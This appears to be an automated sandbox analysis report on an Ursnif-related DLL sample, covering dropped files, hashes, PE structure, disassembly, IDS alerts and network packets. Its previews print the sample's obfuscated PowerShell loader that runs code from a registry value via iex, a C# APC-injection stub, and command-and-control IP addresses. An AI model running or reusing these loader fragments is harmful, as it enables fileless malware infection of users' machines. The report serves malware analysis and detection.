                                  MD5:10C4DEFFF345129A9A7EF066852B06B8
                                  SHA1:BAAD4E83D4E4E039D5CF18084AC88CFA6CDD9EEE
                                  SHA-256:7FD52C3C29CAA24D170C4A78D81AFF855035A7AD622344F50794BC945DC3C088
                                  SHA-512:A9D2042FD2AA7E2AB73604325FA7DB412EAA79C597605381544759794DB3454133D0D02BCDF52079A476B82A2F88FAC5140D4BEADD75E591EB20E67A42206E96
                                  Malicious:false
                                  Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\hpvnexdj\hpvnexdj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hpvnexdj\hpvnexdj.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                  C:\Users\user\AppData\Local\Temp\vebwfha3\CSC57533E6B898B4B7BB8DAE45DDD64B0AA.TMP

                                  Download File
                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                  File Type:MSVC .res
                                  Category:dropped
                                  Size (bytes):652
                                  Entropy (8bit):3.1104316968772165
                                  Encrypted:false
                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry4ak7YnqqOPN5Dlq5J:+RI+ycuZhNGakSOPNnqX
                                  MD5:979D52D8189194B5E14CB5310140FEBF
                                  SHA1:4D78D341E06D50517727664FCDCDEC627218452F
                                  SHA-256:F7CF743322A4D03E4CBCC9E7320B69DEDB181B1C6F114532EE2BB22052903C0D
                                  SHA-512:D02DCFC9C772B79015C3B346A57B6628A42C5A2BB7A864B5A3896F204ECB1AAD677EEE65C22BAC6548219D33B5CDE8E005B140D2D992D5FD675CCF58A5D4ED5C
                                  Malicious:false
                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...v.e.b.w.f.h.a.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...v.e.b.w.f.h.a.3...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                  C:\Users\user\AppData\Local\Temp\vebwfha3\vebwfha3.0.cs

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:UTF-8 Unicode (with BOM) text
                                  Category:dropped
                                  Size (bytes):403
                                  Entropy (8bit):5.058106976759534
                                  Encrypted:false
                                  SSDEEP:6:V/DsYLDS81zuJiWmMRSR7a1nQTsyBSRa+rVSSRnA/fpM+y:V/DTLDfuQWMBDw9rV5nA/3y
                                  MD5:99BD08BC1F0AEA085539BBC7D61FA79D
                                  SHA1:F2CA39B111C367D147609FCD6C811837BE2CE9F3
                                  SHA-256:8DFF0B4F90286A240BECA27EDFC97DCB785B73B8762D3EAE7C540838BC23A3E9
                                  SHA-512:E27A0BF1E73207800F410BA9399F1807FBA940F82260831E43C8F0A8B8BFA668616D63B53755526236433396AF4EF21E1EB0DFA9E92A0F34DB8A14C292660396
                                  Malicious:false
                                  Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class bju. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr wqyemwbu,IntPtr vlbfvx,IntPtr hokikv);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint uqvnjbf,uint pmyb,IntPtr rheqdsvorya);.. }..}.

                                  C:\Users\user\AppData\Local\Temp\vebwfha3\vebwfha3.cmdline

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                  Category:dropped
                                  Size (bytes):369
                                  Entropy (8bit):5.258248605403324
                                  Encrypted:false
                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fNNn0zxs7+AEszIwkn23fN1BH:p37Lvkmb6KRfIWZEifdH
                                  MD5:E3D5180D8E1336C41051105818BE2B0E
                                  SHA1:AE3D5991EDADC6A55D9351A19253C903733F5B04
                                  SHA-256:CC21C5780B903B228B5DA454C5642EC3B5251A2D37C56B88F343C2D27C45EEF2
                                  SHA-512:E8333E056424F83F4BAF44CC097BEF12E427923DB470591F5D54B641B0560A2101FCC8FDA818441932E4F080CD5E55D49F7B4556601C05734B19B285FB002619
                                  Malicious:false
                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\vebwfha3\vebwfha3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\vebwfha3\vebwfha3.0.cs"

                                  C:\Users\user\AppData\Local\Temp\vebwfha3\vebwfha3.dll

                                  Download File
                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):3584
                                  Entropy (8bit):2.6180342948259594
                                  Encrypted:false
                                  SSDEEP:24:etGSw8OmU0t3lm85xWAseO4zFQ64pfUPtkZf63ZVUWI+ycuZhNGakSOPNnq:6KXQ3r5xNO6QfUuJ6H31ulGa3Sq
                                  MD5:150B9753F8C36647FE4D37F3A8DD0546
                                  SHA1:B4E0D8D0142F6E9541DA2DE48EC1AF9F4E1700B6
                                  SHA-256:D850AEE38DE73F32A5AC8D038A8DFF069466260B2335820C578871B7850354BA
                                  SHA-512:6B21F053D792C6383E6237C31B9CB4E37831393773B84560BB7ED271E7BD76B8CC343459D175CAAB474512B782CD27143C191DAB868A9361AACB9F68A832D95C
                                  Malicious:false
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...].b...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....*BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ C............ V.....P ......a.........g.....p.....w.....~...............a. ...a...!.a.%...a.......*.....3.0.....6.......C.......V...........

                                  C:\Users\user\AppData\Local\Temp\vebwfha3\vebwfha3.out

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                                  Category:modified
                                  Size (bytes):866
                                  Entropy (8bit):5.3253388748674
                                  Encrypted:false
                                  SSDEEP:24:AId3ka6KRfZEifdOKaM5DqBVKVrdFAMBJTH:Akka6CZEugKxDcVKdBJj
                                  MD5:EF7C9839A3464CD4591B470A7606772D
                                  SHA1:A0BDFFD77A23860C0CECA610EC39EF0D18791D63
                                  SHA-256:E4225D396AC2BCA46D2270CBB2A3B24219CFA1C80E7B7CE72F8CB615774558F7
                                  SHA-512:35F9BFBB7932DF4BC88D0D0EBFD56AB139B2E858C27D770AC1C97E016C00622D4FBBECB98FA43945A231B46F4847717BC28642E5DAA2272B394A3B6E078B9F68
                                  Malicious:false
                                  Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\vebwfha3\vebwfha3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\vebwfha3\vebwfha3.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                  C:\Users\user\Documents\20220525\PowerShell_transcript.414408.cCtJuFkM.20220525111811.txt

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1367
                                  Entropy (8bit):5.376095725121092
                                  Encrypted:false
                                  SSDEEP:24:BxSA/vm7vBZjx2DOXUW7IJ03LCH64qWkHjeTKKjX4CIym1ZJXHv8IJ03LCH64Dtn:BZ3MvjjoOb+0E64tkqDYB1Zd8+0E64Jn
                                  MD5:0C043058311733BC5A8B342A73C90ABE
                                  SHA1:7B36C2A1E710510276E623A6B0E93548B4091398
                                  SHA-256:BA065A6FDBBD542CA9DCAC0F5A58F8B8FE77995F9EEBB8ABB74E6DCDB520EFB9
                                  SHA-512:49607A25228CF28C2DFEEC6A86E6E03DD372781FF1B7CD60BEB71B20F5DBF5B5FC7E0482022CD8CEBA7ED3F16A9130A5BAAA20BDFEAFBE2D80F6F0CD0E428D22
                                  Malicious:false
                                  Preview:.**********************..Windows PowerShell transcript start..Start time: 20220525111812..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 414408 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name sdiwcaphnc -value gp; new-alias -name ixgamvji -value iex; ixgamvji ([System.Text.Encoding]::ASCII.GetString((sdiwcaphnc HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UrlsReturn))..Process ID: 7056..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220525111812..**********************..PS>new-alias -name sdiwcaphnc -value gp; new-alias -name ixgamvji -value iex; ixga

                                  C:\Users\user\TestLocal.ps1

                                  Download File
                                  Process:C:\Windows\explorer.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):222
                                  Entropy (8bit):5.433287616586257
                                  Encrypted:false
                                  SSDEEP:6:QHYK1sVCVgKnsQ+LgyKBM34H6183F1tu4r9iyeqmM:Qbs8VNsRLgyaI4HnA4cyeHM
                                  MD5:3D92E8BE9593C089C68955E7ADB79EFB
                                  SHA1:97DB408F393D70CA130C8C854CEB135AACCAEA68
                                  SHA-256:149D79E478EAAE27BC4FF92F7EC1D30BEFDE07F61AFEECEA47033AD0A53065D4
                                  SHA-512:7B0A58A56CA83573CDEDB3DAA46AAEB8DCB7C7819971F6BFB0338F71D76CFE0ED91CED5A428EE41E77D8482326EC6C9DEFC9A876238C523C6AE92CA79D8D8D0F
                                  Malicious:false
                                  Preview:new-alias -name dvjacws -value gp;new-alias -name nvbirk -value iex;nvbirk ([System.Text.Encoding]::ASCII.GetString((dvjacws "HKCU:\Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))

                                  C:\Users\user\WhiteBook.lnk

                                  Download File
                                  Process:C:\Windows\explorer.exe
                                  File Type:MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
                                  Category:dropped
                                  Size (bytes):838
                                  Entropy (8bit):3.073236880282747
                                  Encrypted:false
                                  SSDEEP:12:8glVm/3BVSXvk44X3ojsqzKtnWNaVgiNL4t2Y+xIBjK:8p/BHYVKVWiV57aB
                                  MD5:CA1C201059C5BFD5900F5EB2466883CC
                                  SHA1:BF3670A8C06A4FABC5C410F368E178B353F9166C
                                  SHA-256:E5717E89B0D46C5E89F39410FA7A9DE94AA6A3301F8AC920F84F1A7179554085
                                  SHA-512:2273AF46D41B9698B23AEADD8EFBEF80017CFD465B4347CFB99C2FEAE371F39A511288AA64AAFA2E35DD2AD883D8E43D70A65E62C18977C6C6D85E3153041D4C
                                  Malicious:false
                                  Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@............................................W.i.n.d.o.w.s.....Z.1...........System32..B............................................S.y.s.t.e.m.3.2.....t.1...........WindowsPowerShell.T............................................W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l.l... .N.1...........v1.0..:............................................v.1...0.....l.2...........powershell.exe..N............................................p.o.w.e.r.s.h.e.l.l...e.x.e...........\.p.o.w.e.r.s.h.e.l.l...e.x.e.........%...............wN....]N.D...Q..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.................

                                  Static File Info

                                  General

                                  File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.281239366352352
                                  TrID:
                                  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                  • Generic Win/DOS Executable (2004/3) 0.20%
                                  • DOS Executable Generic (2002/1) 0.20%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:628df1368bdb5.dll
                                  File size:438272
                                  MD5:2ced3a825a7b8d9ad0153b2f8566b357
                                  SHA1:4b6484602c29c298b5270f2c95e9aeeabb162737
                                  SHA256:f760495de9b1a0a152075541f40014ceb46925213da7e2c542bc6e606bea46fc
                                  SHA512:6e6d99f59cfa0f2f89f172e349a6fc3fc93482e5de1783ebe38bddac4338b7fe4139b82361caa9c0ed19613cce94b45f4768567a9b1b69faddd9055ed78b9730
                                  SSDEEP:6144:S0mLsr+3OV4DS3D7qBWLARf3RBsFuIiUkok9dHGYgkKeOSnKM66C+m6iMabuFGGK:wsBUSzjLIRBMkf9dHLpKepKr6CvXG
                                  TLSH:EC94F14857685D66D84647370CE1971EFCE7FE2EE63B7ABE20642C8FF95B0104912B0A
                                  File Content Preview:MZ......................@...........................................................(.......0...w+!.W....]v...............4.....Y^........7.......x.........<.............A.............., ......,%.......{.......7.o.......O.....4.......5.......@.....Rich...

                                  File Icon

                                  Icon Hash:9068eccc64f6e2ad

                                  Static PE Info

                                  General

                                  Entrypoint:0x401520
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                  Time Stamp:0x3EC34607 [Thu May 15 07:47:19 2003 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:0
                                  File Version Major:5
                                  File Version Minor:0
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:0
                                  Import Hash:8000dfa78ad003480e4532227762516a

                                  Entrypoint Preview

                                  Instruction
                                  push ebp
                                  mov ebp, esp
                                  inc edx
                                  add ecx, FFFFFFFFh
                                  call 00007FF33112452Ah
                                  pop eax
                                  pop eax
                                  mov dword ptr [004136F4h], eax
                                  mov edx, dword ptr [00413810h]
                                  sub edx, 00005289h
                                  call edx
                                  mov eax, ebx
                                  mov dword ptr [004136F0h], eax
                                  mov eax, esi
                                  mov dword ptr [004136E8h], eax
                                  mov dword ptr [004136F8h], ebp
                                  mov dword ptr [004136ECh], edi
                                  add dword ptr [004136F8h], 00000004h
                                  loop 00007FF3311244D7h
                                  mov dword ptr [ebp+00h], eax
                                  nop
                                  nop
                                  xor eax, ebx
                                  xchg eax, ebp
                                  jnbe 00007FF33112453Fh
                                  xor dword ptr fs:[edi+7410DF14h], ecx
                                  in al, dx
                                  sbb ecx, dword ptr [edx-4BE066DDh]
                                  adc al, 5Ah
                                  pop ss
                                  scasd
                                  push ss
                                  mov esp, BDFBFCACh
                                  dec edi
                                  dec edi
                                  inc ebx
                                  mov dh, 69h
                                  jle 00007FF331124535h
                                  jno 00007FF331124517h
                                  or ah, bl
                                  jno 00007FF3311244D7h
                                  jmp 00007FF2DAACE122h
                                  push edx
                                  adc edi, eax
                                  adc dword ptr [edi], eax
                                  inc ecx
                                  push es
                                  loope 00007FF3311244B1h
                                  mov esi, BBE334D9h
                                  mov bh, 32h
                                  sub cl, byte ptr [edi]
                                  mov dword ptr [8C9943A9h], eax
                                  push es
                                  pop ds
                                  sal byte ptr [edi], 1
                                  jp 00007FF3311244F8h
                                  dec esi
                                  pop esi
                                  sahf
                                  add al, 75h
                                  loope 00007FF3311244CAh
                                  daa
                                  or eax, dword ptr [esi-4Ch]
                                  push cs
                                  push FEA26B46h
                                  imul edx, dword ptr [eax+66h], D5h
                                  sbb al, 4Bh
                                  adc ah, byte ptr [ebp+01h]
                                  xchg byte ptr [ecx-414D2E51h], bl
                                  aad 8Ah
                                  leave
                                  cmp al, 56h
                                  sbb bl, dh
                                  or byte ptr [ecx-71h], 0000001Fh
                                  stosd

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xd8a00x8c.rdata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x610000x9f28.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x6b0000xf3c.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0xd0000x7c.rdata
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x10000xb8c00xc000False0.0830078125data1.1298671209IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                  .rdata0xd0000xbea0x1000False0.286376953125data4.80076279463IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .data0xe0000x7b800x6000False0.380167643229data5.99893454106IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                  .crt0x160000x1dc010x1e000False0.988452148437data7.98104004555IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                  .erloc0x340000x2c91e0x2d000False0.988232421875data7.98142116636IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                  .rsrc0x610000x9f280xa000False0.602783203125data6.51666400073IMAGE_SCN_LNK_REMOVE, IMAGE_SCN_TYPE_NO_PAD, IMAGE_SCN_TYPE_GROUP, IMAGE_SCN_LNK_INFO, IMAGE_SCN_MEM_PROTECTED, IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_NO_DEFER_SPEC_EXC, IMAGE_SCN_MEM_READ
                                  .reloc0x6b0000x133a0x2000False0.218994140625data3.75989927364IMAGE_SCN_TYPE_NOLOAD, IMAGE_SCN_TYPE_NO_PAD, IMAGE_SCN_MEM_FARDATA, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_LNK_OTHER, IMAGE_SCN_LNK_INFO, IMAGE_SCN_LNK_OVER, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_LNK_COMDAT, IMAGE_SCN_GPREL, IMAGE_SCN_MEM_READ

                                  Resources

                                  NameRVASizeTypeLanguageCountry
                                  RT_BITMAP0x613600x666dataEnglishUnited States
                                  RT_ICON0x619c80x485dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                  RT_ICON0x662280x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544EnglishUnited States
                                  RT_ICON0x687d00xea8dataEnglishUnited States
                                  RT_ICON0x696780x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                  RT_ICON0x69f200x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                                  RT_DIALOG0x6a4880xb4dataEnglishUnited States
                                  RT_DIALOG0x6a5400x120dataEnglishUnited States
                                  RT_DIALOG0x6a6600x158dataEnglishUnited States
                                  RT_DIALOG0x6a7b80x202dataEnglishUnited States
                                  RT_DIALOG0x6a9c00xf8dataEnglishUnited States
                                  RT_DIALOG0x6aab80xa0dataEnglishUnited States
                                  RT_DIALOG0x6ab580xeedataEnglishUnited States
                                  RT_GROUP_ICON0x6ac480x4cdataEnglishUnited States
                                  RT_VERSION0x6ac980x290MS Windows COFF PA-RISC object fileEnglishUnited States

                                  Imports

                                  DLLImport
                                  ADVAPI32.dllEnumServicesStatusExW, RegGetValueA, GetSidSubAuthorityCount
                                  msvcrt.dllfgetwc, strcoll
                                  USER32.dllGetClassNameA, LockWorkStation, GetMessagePos, GetWindowWord, IsWindow, GetClientRect, GetUpdateRgn
                                  GDI32.dllGetCharWidthFloatA, GetTextMetricsW, ExtEscape
                                  OLEAUT32.dllLoadTypeLibEx
                                  KERNEL32.dllGetBinaryTypeA, GetModuleFileNameA, LocalHandle, GetThreadLocale, GetFileTime, GlobalFlags, EnumResourceTypesA, GetCommState, GlobalFree

                                  Version Infos

                                  DescriptionData
                                  LegalCopyright A Company. All rights reserved.
                                  InternalName
                                  FileVersion1.0.0.0
                                  CompanyNameA Company
                                  ProductName
                                  ProductVersion1.0.0.0
                                  FileDescription
                                  OriginalFilenamemyfile.exe
                                  Translation0x0409 0x04b0

                                  Possible Origin

                                  Language of compilation systemCountry where language is spokenMap
                                  EnglishUnited States

                                  Network Behavior

                                  Snort IDS Alerts

                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                  192.168.2.4176.10.119.6849770802033204 05/25/22-11:18:02.070939TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4977080192.168.2.4176.10.119.68
                                  192.168.2.413.107.43.1649761802033204 05/25/22-11:17:41.032657TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4976180192.168.2.413.107.43.16
                                  192.168.2.4176.10.119.6849770802033203 05/25/22-11:18:02.070939TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4977080192.168.2.4176.10.119.68
                                  192.168.2.413.107.43.1649761802033203 05/25/22-11:17:41.032657TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4976180192.168.2.413.107.43.16

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  May 25, 2022 11:18:01.140960932 CEST4977080192.168.2.4176.10.119.68
                                  May 25, 2022 11:18:01.159096003 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.159204960 CEST4977080192.168.2.4176.10.119.68
                                  May 25, 2022 11:18:01.167475939 CEST4977080192.168.2.4176.10.119.68
                                  May 25, 2022 11:18:01.185698986 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.458622932 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.458658934 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.458677053 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.458698988 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.458722115 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.458720922 CEST4977080192.168.2.4176.10.119.68
                                  May 25, 2022 11:18:01.458739042 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.458764076 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.458775043 CEST4977080192.168.2.4176.10.119.68
                                  May 25, 2022 11:18:01.458790064 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.458806038 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.458820105 CEST4977080192.168.2.4176.10.119.68
                                  May 25, 2022 11:18:01.458822966 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.458842039 CEST4977080192.168.2.4176.10.119.68
                                  May 25, 2022 11:18:01.458859921 CEST4977080192.168.2.4176.10.119.68
                                  May 25, 2022 11:18:01.458903074 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.458925962 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.458941936 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.458966017 CEST4977080192.168.2.4176.10.119.68
                                  May 25, 2022 11:18:01.459072113 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.459111929 CEST4977080192.168.2.4176.10.119.68
                                  May 25, 2022 11:18:01.476986885 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.477108955 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.477128029 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.477138996 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.477144957 CEST4977080192.168.2.4176.10.119.68
                                  May 25, 2022 11:18:01.477190971 CEST4977080192.168.2.4176.10.119.68
                                  May 25, 2022 11:18:01.477195978 CEST4977080192.168.2.4176.10.119.68
                                  May 25, 2022 11:18:01.477325916 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.477363110 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.477376938 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.477387905 CEST4977080192.168.2.4176.10.119.68
                                  May 25, 2022 11:18:01.477422953 CEST4977080192.168.2.4176.10.119.68
                                  May 25, 2022 11:18:01.477488995 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.477514029 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.477531910 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.477570057 CEST4977080192.168.2.4176.10.119.68
                                  May 25, 2022 11:18:01.477811098 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.477843046 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.477860928 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.477864027 CEST4977080192.168.2.4176.10.119.68
                                  May 25, 2022 11:18:01.477885008 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.477885962 CEST4977080192.168.2.4176.10.119.68
                                  May 25, 2022 11:18:01.477911949 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.477926016 CEST4977080192.168.2.4176.10.119.68
                                  May 25, 2022 11:18:01.477931976 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.477952003 CEST4977080192.168.2.4176.10.119.68
                                  May 25, 2022 11:18:01.477956057 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.477983952 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.478002071 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.478029966 CEST4977080192.168.2.4176.10.119.68
                                  May 25, 2022 11:18:01.478179932 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.478208065 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.478223085 CEST8049770176.10.119.68192.168.2.4
                                  May 25, 2022 11:18:01.478235006 CEST4977080192.168.2.4176.10.119.68
                                  May 25, 2022 11:18:01.478255987 CEST4977080192.168.2.4176.10.119.68
